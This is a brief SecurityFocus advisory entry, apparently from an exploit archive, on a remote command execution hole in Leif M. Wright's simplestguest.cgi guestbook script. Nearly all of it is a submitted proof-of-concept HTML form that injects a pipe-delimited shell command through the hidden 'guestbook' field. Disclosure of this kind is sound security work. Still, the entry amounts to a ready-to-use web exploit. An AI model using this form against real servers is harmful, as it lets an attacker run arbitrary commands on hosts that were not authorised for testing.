Leif M. Wright simplestguest.cgi Remote Command Execution Vulnerability

The following example was submitted by scott <smackenz@brad.ac.uk>:

Make a html form similar to:

<form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <COMMAND> |">
                 <input type=hidden name="NAME" value="user">
                 <input type=submit>
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus